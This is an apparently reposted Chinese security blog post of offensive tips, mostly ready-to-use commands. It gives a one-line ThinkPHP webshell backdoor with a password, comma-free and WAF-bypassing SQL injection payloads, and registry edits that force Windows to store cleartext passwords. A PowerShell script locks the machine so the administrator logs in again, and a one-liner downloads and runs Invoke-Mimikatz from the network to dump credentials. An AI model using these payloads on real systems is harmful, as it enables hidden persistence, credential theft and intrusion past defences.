http://www.heresec.com你值得拥有
thinkphp框架留后门:
随意找个controller
I('post.heresec', '', I('get.i'));连接方式: http://xxxx/xxxx?i=assert
密码: heresec
from:www.leavesongs.com
注入过滤逗号:
127' UNION SELECT * FROM ((SELECT1)a JOIN (SELECT2)b JOIN (SELECT3)c JOIN (SELECT4)d JOIN (SELECT5)e)#
相当于 127' union select 1,2,3,4,5
win2012抓明文
先修改
HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了
cmd修改
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1
powershell修改
PS C:> New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest -Name UseLogonCredential -Type DWORD -Value 1
powershell锁定机器,目的是让管理重新登录
PS C:> Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
一键获取明文密码
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
关于90sec中绕过安全狗的方式似乎是老方法了,from还是拦截
不过如果是给企业做安全检测的话 可以用的上
/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
文章来自:http://www.heresec.com/index.php/archives/95/
本文始发于微信公众号(关注安全技术):还是一些东西。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论